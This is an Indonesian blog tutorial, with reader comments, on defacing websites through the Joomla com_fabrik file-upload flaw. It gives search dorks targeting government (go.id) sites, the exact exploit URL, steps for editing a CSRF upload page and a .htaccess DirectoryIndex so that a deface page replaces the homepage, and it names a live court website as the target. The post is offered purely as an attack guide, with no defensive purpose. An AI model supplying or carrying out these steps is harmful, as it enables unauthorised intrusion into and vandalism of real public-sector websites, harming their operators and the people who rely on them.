Cara Deface Com_Fabrik with htaccess

Cara Deface Com_Fabrik with htaccess

Hello Bertemu Lagi Dengan Saya kali ini saya akan memberikan tutorial cara deface web metode com_fabrik


Oke langsung saja ya :v



-Bahan Bahan yang di butuhkan adalah


- Dork Com_Fabrik

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:go.id
inurl:index.php?option=com_fabrik&view= site:go.id
inurl:importcsv.php site:go.id

(site nya bisa di ganti selain go.id / dork bisa di kembangin sendiri )
 

- Csrf Com_Fabrik KLIK me

- File .htaccess Touch Me beb

- Script Deface Pasti Udah Pada Punya :v

- Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

- Live Target: http://pn-maros.go.id


langsung saja ke tutorial nya



1) Dorking Seperti Biasa cari site yang kira kira vlun


2) Kalau dah dapet masukan exploit nya contoh


"http://pn-maros.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

 Kalau Vlun muncul tulisan seperti ini



3) Selanju nya kita edit script csrf nya untuk mengupload file htaccess nya


    Edit Yang Bagian Ini saja http://site.com ganti dengan site yang mau di

    eksekusi ya :v


 

    Kalau Udah di edit jangan lupa save ya :v


4) Selanjut nya Edit File  htaccess nya Edit Di Bagian

     "DirectoryIndex frogs.html"

     frogs.html ganti dengan nama scrip deface kalian


     Kalau sudah selesai ngedit nya buka csrf nya


5)  Upload File .htaccess Nya dulu kalau berhasil ada tulisan kayak gini


    {"filepath":"\/.htaccess","uri":"http:\/\/pn-maros.go.id\/.htaccess"}



    Kalau udah berhasil UP  flie htaccess nya langsung saja up script deface  

    kalian Kalau Dah Selesai Up .htaccess Dan Script Nya langsung aja cek web

    nya

    kalau gak ke deface ya cari web lagi jangan putus asa


    Tutorial Video



Share This :
avatar

Blogger M Malik@ makasih mas sering sering kunjungi yak 😅

Delete May 30, 2018 at 7:58 AM
avatar

target sudah jarang yang memiliki vunlerability mas . jadi ya agak susah dapetin target nya hehehe. tunggu kami update tutorial terbaru kami ya hehehe

Delete May 30, 2018 at 8:05 AM
avatar

Susah banyak yg gk vuln walaupun pake exploit terlihat vuln pas masuk crsf pas di tebas biasa aja

Delete November 5, 2018 at 12:04 PM